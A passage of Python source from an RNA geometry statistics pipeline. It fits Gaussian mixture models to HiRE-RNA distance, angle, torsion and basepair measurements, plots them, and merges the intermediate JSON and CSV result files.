GMM_histo(eta_prime, "Eta'", scan, toric=True, hist=False, col='cyan')
GMM_histo(theta_prime, "Theta'", scan, toric=True, hist=False, col='crimson')
GMM_histo(eta_base, "Eta''", scan, toric=True, hist=False, col='royalblue')
GMM_histo(theta_base, "Theta''", scan, toric=True, hist=False, col='palevioletred')
plt.xlabel("Angle (Degrees)")
plt.title("GMM of pseudo-torsion angles (Pyle Model)")
plt.savefig("GMM_pseudotorsion_angles_pyle_model.png")
plt.close()
os.chdir(runDir)
setproctitle("GMM (Pyle model) finished")
@trace_unhandled_exceptions
def gmm_hrna(scan):
"""
Draw the figures representing the data on the measurements between atoms of the HiRE-RNA model
"""
setproctitle("GMM (HiRE-RNA)")
# Distances
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/distances/distances_HiRERNA.csv"))
last_c4p_p = list(df["C4'-P"][~ np.isnan(df["C4'-P"])])
p_o5p = list(df["P-O5'"][~ np.isnan(df["P-O5'"])])
o5p_c5p = list(df["O5'-C5'"][~ np.isnan(df["O5'-C5'"])])
c5p_c4p = list(df["C5'-C4'"][~ np.isnan(df["C5'-C4'"])])
c4p_c1p = list(df["C4'-C1'"][~ np.isnan(df["C4'-C1'"])])
c1p_b1 = list(df["C1'-B1"][~ np.isnan(df["C1'-B1"])])
b1_b2 = list(df["B1-B2"][~ np.isnan(df["B1-B2"])])
os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/distances/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/distances/")
GMM_histo(o5p_c5p, "O5'-C5'", scan)
GMM_histo(b1_b2, "B1-B2", scan)
GMM_histo(c1p_b1, "C1'-B1", scan)
GMM_histo(c5p_c4p, "C5'-C4'", scan)
GMM_histo(c4p_c1p, "C4'-C1'", scan)
GMM_histo(p_o5p, "P-O5'", scan)
GMM_histo(last_c4p_p, "C4'-P", scan)
GMM_histo(o5p_c5p, "O5'-C5'", scan, toric=False, hist=False, col='lightcoral')
GMM_histo(b1_b2, "B1-B2", scan, toric=False, hist=False, col='limegreen')
GMM_histo(c1p_b1, "C1'-B1", scan, toric=False, hist=False, col='tomato')
GMM_histo(c5p_c4p, "C5'-C4'", scan, toric=False, hist=False, col='aquamarine')
GMM_histo(c4p_c1p, "C4'-C1'", scan, toric=False, hist=False, col='goldenrod')
GMM_histo(p_o5p, "P-O5'", scan, toric=False, hist=False, col='darkcyan')
GMM_histo(last_c4p_p, "C4'-P", scan, toric=False, hist=False, col='deeppink')
axes = plt.gca()
axes.set_ylim(0, 100)
plt.xlabel("Distance (Angströms)")
plt.title("GMM of distances between HiRE-RNA beads")
plt.savefig(runDir + "/results/figures/GMM/HiRE-RNA/distances/GMM_distances_HiRE_RNA.png")
plt.close()
# Angles
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/angles/angles_HiRERNA.csv"))
lastc4p_p_o5p = list(df["C4'-P-O5'"][~ np.isnan(df["C4'-P-O5'"])])
lastc1p_lastc4p_p = list(df["C1'-C4'-P"][~ np.isnan(df["C1'-C4'-P"])])
lastc5p_lastc4p_p = list(df["C5'-C4'-P"][~ np.isnan(df["C5'-C4'-P"])])
p_o5p_c5p = list(df["P-O5'-C5'"][~ np.isnan(df["P-O5'-C5'"])])
o5p_c5p_c4p = list(df["O5'-C5'-C4'"][~ np.isnan(df["O5'-C5'-C4'"])])
c5p_c4p_c1p = list(df["C5'-C4'-C1'"][~ np.isnan(df["C5'-C4'-C1'"])])
c4p_c1p_b1 = list(df["C4'-C1'-B1"][~ np.isnan(df["C4'-C1'-B1"])])
c1p_b1_b2 = list(df["C1'-B1-B2"][~ np.isnan(df["C1'-B1-B2"])])
os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/angles/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/angles/")
GMM_histo(lastc4p_p_o5p, "C4'-P-O5'", scan, toric=True)
GMM_histo(lastc1p_lastc4p_p, "C1'-C4'-P", scan, toric=True)
GMM_histo(lastc5p_lastc4p_p, "C5'-C4'-P", scan, toric=True)
GMM_histo(p_o5p_c5p, "P-O5'-C5'", scan, toric=True)
GMM_histo(o5p_c5p_c4p, "O5'-C5'-C4'", scan, toric=True)
GMM_histo(c5p_c4p_c1p, "C5'-C4'-C1'", scan, toric=True)
GMM_histo(c4p_c1p_b1, "C4'-C1'-B1", scan, toric=True)
GMM_histo(c1p_b1_b2, "C1'-B1-B2", scan, toric=True)
GMM_histo(lastc4p_p_o5p, "C4'-P-O5'", scan, toric=True, hist=False, col='lightcoral')
GMM_histo(lastc1p_lastc4p_p, "C1'-C4'-P", scan, toric=True, hist=False, col='limegreen')
GMM_histo(lastc5p_lastc4p_p, "C5'-C4'-P", scan, toric=True, hist=False, col='tomato')
GMM_histo(p_o5p_c5p, "P-O5'-C5'", scan, toric=True, hist=False, col='aquamarine')
GMM_histo(o5p_c5p_c4p, "O5'-C5'-C4'", scan, toric=True, hist=False, col='goldenrod')
GMM_histo(c5p_c4p_c1p, "C5'-C4'-C1'", scan, toric=True, hist=False, col='darkcyan')
GMM_histo(c4p_c1p_b1, "C4'-C1'-B1", scan, toric=True, hist=False, col='deeppink')
GMM_histo(c1p_b1_b2, "C1'-B1-B2", scan, toric=True, hist=False, col='indigo')
axes = plt.gca()
axes.set_ylim(0, 100)
plt.xlabel("Angle (Degres)")
plt.title("GMM of angles between HiRE-RNA beads")
plt.savefig(runDir + "/results/figures/GMM/HiRE-RNA/angles/GMM_angles_HiRE_RNA.png")
plt.close()
# Torsions
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA.csv"))
p_o5_c5_c4 = list(df["P-O5'-C5'-C4'"][~ np.isnan(df["P-O5'-C5'-C4'"])])
o5_c5_c4_c1 = list(df["O5'-C5'-C4'-C1'"][~ np.isnan(df["O5'-C5'-C4'-C1'"])])
c5_c4_c1_b1 = list(df["C5'-C4'-C1'-B1"][~ np.isnan(df["C5'-C4'-C1'-B1"])])
c4_c1_b1_b2 = list(df["C4'-C1'-B1-B2"][~ np.isnan(df["C4'-C1'-B1-B2"])])
o5_c5_c4_psuiv = list(df["O5'-C5'-C4'-P°"][~ np.isnan(df["O5'-C5'-C4'-P°"])])
c5_c4_psuiv_o5suiv = list(df["C5'-C4'-P°-O5'°"][~ np.isnan(df["C5'-C4'-P°-O5'°"])])
c4_psuiv_o5suiv_c5suiv = list(df["C4'-P°-O5'°-C5'°"][~ np.isnan(df["C4'-P°-O5'°-C5'°"])])
c1_c4_psuiv_o5suiv = list(df["C1'-C4'-P°-O5'°"][~ np.isnan(df["C1'-C4'-P°-O5'°"])])
os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/torsions/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/torsions/")
GMM_histo(p_o5_c5_c4, "P-O5'-C5'-C4'", scan, toric=True)
GMM_histo(o5_c5_c4_c1, "O5'-C5'-C4'-C1'", scan, toric=True)
GMM_histo(c5_c4_c1_b1, "C5'-C4'-C1'-B1", scan, toric=True)
GMM_histo(c4_c1_b1_b2, "C4'-C1'-B1-B2", scan, toric=True)
GMM_histo(o5_c5_c4_psuiv, "O5'-C5'-C4'-P°", scan, toric=True)
GMM_histo(c5_c4_psuiv_o5suiv, "C5'-C4'-P°-O5'°", scan, toric=True)
GMM_histo(c4_psuiv_o5suiv_c5suiv, "C4'-P°-O5'°-C5'°", scan, toric=True)
GMM_histo(c1_c4_psuiv_o5suiv, "C1'-C4'-P°-O5'°", scan, toric=True)
GMM_histo(p_o5_c5_c4, "P-O5'-C5'-C4'", scan, toric=True, hist=False, col='darkred')
GMM_histo(o5_c5_c4_c1, "O5'-C5'-C4'-C1'", scan, toric=True, hist=False, col='chocolate')
GMM_histo(c5_c4_c1_b1, "C5'-C4'-C1'-B1", scan, toric=True, hist=False, col='mediumvioletred')
GMM_histo(c4_c1_b1_b2, "C4'-C1'-B1-B2", scan, toric=True, hist=False, col='cadetblue')
GMM_histo(o5_c5_c4_psuiv, "O5'-C5'-C4'-P°", scan, toric=True, hist=False, col='darkkhaki')
GMM_histo(c5_c4_psuiv_o5suiv, "C5'-C4'-P°-O5'°", scan, toric=True, hist=False, col='springgreen')
GMM_histo(c4_psuiv_o5suiv_c5suiv, "C4'-P°-O5'°-C5'°", scan, toric=True, hist=False, col='indigo')
GMM_histo(c1_c4_psuiv_o5suiv, "C1'-C4'-P°-O5'°", scan, toric=True, hist=False, col='gold')
plt.xlabel("Angle (Degrees)")
plt.title("GMM of torsion angles between HiRE-RNA beads")
plt.savefig("GMM_torsions_HiRE_RNA.png")
plt.close()
os.chdir(runDir)
setproctitle("GMM (HiRE-RNA) finished")
@trace_unhandled_exceptions
def gmm_hrna_basepairs(scan):
"""
Measures parameters of all kinds of non-canonical basepairs for the HiRE-RNA model.
Please see Cragnolini & al 2015 to understand them.
"""
setproctitle("GMM (HiRE-RNA basepairs)")
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/basepairs/basepairs_HiRERNA.csv"))
lw = ["cWW", "tWW", "cWH", "tWH", "cHW", "tHW", "cWS", "tWS", "cSW", "tSW", "cHH", "tHH", "cSH", "tSH", "cHS", "tHS", "cSS", "tSS"]
os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/basepairs/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/basepairs/")
for lw_type in lw:
data = df[df['type_LW'] == lw_type ]
if len(data):
for b1 in ['A','C','G','U']:
for b2 in ['A','C','G','U']:
thisbases = data[(data.nt1_res == b1)&(data.nt2_res == b2)]
if len(thisbases):
gmm_hrna_basepair_type(lw_type, b1+b2, thisbases, scan)
os.chdir(runDir)
setproctitle(f"GMM (HiRE-RNA basepairs) finished")
@trace_unhandled_exceptions
def gmm_hrna_basepair_type(type_LW, ntpair, data, scan):
"""
function to plot the statistical figures you want
By type of pairing:
Superposition of GMMs of plane angles
Superposition of the histogram and the GMM of the distances
all in the same window
"""
setproctitle(f"GMM (HiRE-RNA {type_LW} basepairs)")
figure = plt.figure(figsize = (10, 10))
plt.gcf().subplots_adjust(left = 0.1, bottom = 0.1, right = 0.9, top = 0.9, wspace = 0, hspace = 0.5)
plt.subplot(2, 1, 1)
GMM_histo(data["211_angle"], f"{type_LW}_{ntpair}_C1'-B1-B1pair", scan, toric=True, hist=False, col='cyan' )
GMM_histo(data["112_angle"], f"{type_LW}_{ntpair}_B1-B1pair-C1'pair", scan, toric=True, hist=False, col='magenta')
GMM_histo(data["3211_torsion"], f"{type_LW}_{ntpair}_C4'-C1'-B1-B1pair", scan, toric=True, hist=False, col='black' )
GMM_histo(data["1123_torsion"], f"{type_LW}_{ntpair}_B1-B1pair-C1'pair-C4'pair", scan, toric=True, hist=False, col='maroon')
GMM_histo(data["alpha1"], f"{type_LW}_{ntpair}_alpha_1", scan, toric=True, hist=False, col="yellow")
GMM_histo(data["alpha2"], f"{type_LW}_{ntpair}_alpha_2", scan, toric=True, hist=False, col='olive')
plt.xlabel("Angle (degree)")
plt.title(f"GMM of plane angles for {type_LW} {ntpair} basepairs", fontsize=10)
plt.subplot(2, 1, 2)
GMM_histo(data["Distance"], f"{type_LW}_{ntpair}_tips_distance", scan, toric=False, hist=False, col="cyan")
GMM_histo(data["dB1"], f"{type_LW}_{ntpair}_dB1", scan, toric=False, hist=False, col="tomato")
GMM_histo(data["dB2"], f"{type_LW}_{ntpair}_dB2", scan, toric=False, hist=False, col="goldenrod")
plt.xlabel("Distance (Angströms)")
plt.title(f"GMM of distances for {type_LW} {ntpair} basepairs", fontsize=10)
plt.savefig(f"{type_LW}_{ntpair}_basepairs.png" )
plt.close()
setproctitle(f"GMM (HiRE-RNA {type_LW} {ntpair} basepairs) finished")
@trace_unhandled_exceptions
def merge_jsons(do_hrna):
"""
Reads the tons of JSON files produced by the geometric analyses, and compiles them into fewer files.
It is simple concatenation of the JSONs.
The original files are then deleted.
"""
# All atom distances
bonds = ["O3'-P", "P-OP1", "P-OP2", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-O4'", "C4'-C3'", "O4'-C1'", "C1'-C2'", "C2'-O2'", "C2'-C3'", "C3'-O3'", "C1'-N9",
"N9-C8", "C8-N7", "N7-C5", "C5-C6", "C6-O6", "C6-N6", "C6-N1", "N1-C2", "C2-N2", "C2-N3", "N3-C4", "C4-N9", "C4-C5",
"C1'-N1", "N1-C6", "C6-C5", "C5-C4", "C4-N3", "N3-C2", "C2-O2", "C2-N1", "C4-N4", "C4-O4"]
bonds = [ runDir + "/results/geometry/json/" + x + ".json" for x in bonds ]
concat_jsons(bonds, runDir + "/results/geometry/json/all_atom_distances.json")
# All atom torsions
torsions = ["Alpha", "Beta", "Gamma", "Delta", "Epsilon", "Xhi", "Zeta"]
torsions = [ runDir + "/results/geometry/json/" + x + ".json" for x in torsions ]
concat_jsons(torsions, runDir + "/results/geometry/json/all_atom_torsions.json")
# Delete previous files
for f in bonds + torsions:
try:
os.remove(f)
except FileNotFoundError:
pass
if do_hrna:
# HiRE-RNA distances
hrnabonds = [r"P-O5'", r"O5'-C5'", r"C5'-C4'", r"C4'-C1'", r"C1'-B1", r"B1-B2", r"C4'-P"]
hrnabonds = [ runDir + "/results/geometry/json/" + x + ".json" for x in hrnabonds ]
concat_jsons(hrnabonds, runDir + "/results/geometry/json/hirerna_distances.json")
# HiRE-RNA angles
hrnaangles = [r"P-O5'-C5'", r"O5'-C5'-C4'", r"C5'-C4'-C1'", r"C4'-C1'-B1", r"C1'-B1-B2", r"C4'-P-O5'", r"C5'-C4'-P", r"C1'-C4'-P"]
hrnaangles = [ runDir + "/results/geometry/json/" + x + ".json" for x in hrnaangles ]
concat_jsons(hrnaangles, runDir + "/results/geometry/json/hirerna_angles.json")
# HiRE-RNA torsions
hrnators = [r"P-O5'-C5'-C4'", r"O5'-C5'-C4'-C1'", r"C5'-C4'-C1'-B1", r"C4'-C1'-B1-B2", r"C4'-P°-O5'°-C5'°", r"C5'-C4'-P°-O5'°", r"C1'-C4'-P°-O5'°", r"O5'-C5'-C4'-P°"]
hrnators = [ runDir + "/results/geometry/json/" + x + ".json" for x in hrnators ]
concat_jsons(hrnators, runDir + "/results/geometry/json/hirerna_torsions.json")
# HiRE-RNA basepairs
for nt1 in ['A', 'C', 'G', 'U']:
for nt2 in ['A', 'C', 'G', 'U']:
bps = glob.glob(runDir + f"/results/geometry/json/*{nt1}{nt2}*.json")
concat_jsons(bps, runDir + f"/results/geometry/json/hirerna_{nt1}{nt2}_basepairs.json")
# Delete previous files
for f in hrnabonds + hrnaangles + hrnators:
try:
os.remove(f)
except FileNotFoundError:
pass
for f in glob.glob(runDir + "/results/geometry/json/t*.json"):
try:
os.remove(f)
except FileNotFoundError:
pass
for f in glob.glob(runDir + "/results/geometry/json/c*.json"):
try:
os.remove(f)
except FileNotFoundError:
pass
for f in glob.glob(runDir + "/results/geometry/json/*tips_distance.json"):
try:
os.remove(f)
except FileNotFoundError:
pass
@trace_unhandled_exceptions
def concat_worker(bunch):
"""
Concatenates a bunch of CSV files and returns a Pandas DataFrame.
bunch: List of strings (filepaths to CSV files)
The function logs concatenations to a global TQDM progress bar.
The function is expected to be used in parallel.
"""
global sharedpbar
global finished
# initiate the dataframe with the first CSV file
df_tot = pd.read_csv(bunch.pop(), engine="c")
with finished.get_lock():
finished.value += 1
for f in range(len(bunch)):
# Read and concatenate a new file
df = pd.read_csv(bunch.pop(), engine='c')
df_tot = pd.concat([df_tot, df], ignore_index=True)
# Update the global progress bar
with finished.get_lock():
finished.value += 1
with sharedpbar.get_lock():
sharedpbar.n = finished.value
sharedpbar.refresh()
return df_tot
@trace_unhandled_exceptions
def concat_dataframes(fpath, outfilename, nworkers):
"""
Concatenates the CSV files from fpath folder into a DataFrame gathering all.
The function splits the file list into nworkers concatenation workers, and then merges the nworkers dataframes.
"""
setproctitle(f"Concatenation of {fpath}")
# Get the list of files
flist = os.listdir(fpath)
random.shuffle(flist)
flist = [ os.path.abspath(fpath + x) for x in flist ]
# Define a global progress bar to be shared between workers
global sharedpbar
global finished
sharedpbar = tqdm(total=len(flist), position=0, desc="Preparing "+outfilename, leave=False)
finished = Value('i', 0)
# Divide the list into chunks
start = 0
end = int(len(flist)/nworkers)+1
size = end
chunks = []
for i in range(nworkers):
if i == nworkers-1:
chunks.append(flist[start:])
else:
chunks.append(flist[start:end])
start, end = end, end+size
# Run parallel concatenations
p = Pool(initializer=init_with_tqdm, initargs=(tqdm.get_lock(),), processes=nworkers)
results = p.map(concat_worker, chunks, chunksize=1)
p.close()
p.join()
sharedpbar.close()
# Concatenate the results and save
df_tot = pd.concat(results, ignore_index=True)
df_tot.to_csv(fpath + outfilename)
@trace_unhandled_exceptions
def concat_jsons(flist, outfilename):
"""
Reads JSON files computed by the geometry jobs and merge them into a smaller
number of files
"""
result = []
for f in flist:
if not os.path.isfile(f):
warn("Unable to find "+f.split('/')[-1])
continue
with open(f, "rb") as infile:
result.append(json.load(infile))
# write the files
with open(outfilename, 'w', encoding='utf-8') as f:
json.dump(result, f, indent=4)
if __name__ == "__main__":
print("This file is not supposed to be run directly. Run statistics.py instead.") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.